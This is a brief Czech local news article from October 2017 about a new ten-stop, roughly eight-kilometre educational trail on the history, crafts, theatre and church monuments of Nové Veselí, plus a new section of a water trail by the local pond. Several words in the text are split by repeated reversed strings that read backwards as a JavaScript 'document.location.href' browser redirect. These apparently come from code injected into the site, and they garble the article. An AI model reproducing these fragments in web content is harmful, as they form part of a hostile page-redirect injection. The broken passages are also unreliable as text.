Rainbow page separator

Po Novém Veselí zvědavé turisty provádí nová naučná stezka

Středa, 25. října 2017

Nové Veselí / His[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torii městečka, významné stavby, církevní památky, osobnosti městyse či společenský život přibližuje nová naučná stezka s názvem To naše Nové Veselí. Má celkem deset zastavení a turisty i další zájemce o bližší informace o městysi na trase dlouhé přibližně osm kilometrů provede celým Novým Veselím.
Na každém zastavení je popsána některá z místních zajímavostí, jež se ke konkrétní lokalitě vztahuje. Jednotlivé panely, vždy s jedním stěžejním tématem, jsou mimo his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torie věnovány kupříkladu také řemeslům, divadlu, hudbě nebo církevním památkám.
Kromě té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to nové naučné stezky, která připomíná dějiny městečka, byla ve Veselí před nedávnem rovněž uvedena do provozu druhá část zhruba dvoukilometrové naučné Vodní stezky kolem Veselského rybníka. Její první část už turisté využívají od roku 2015.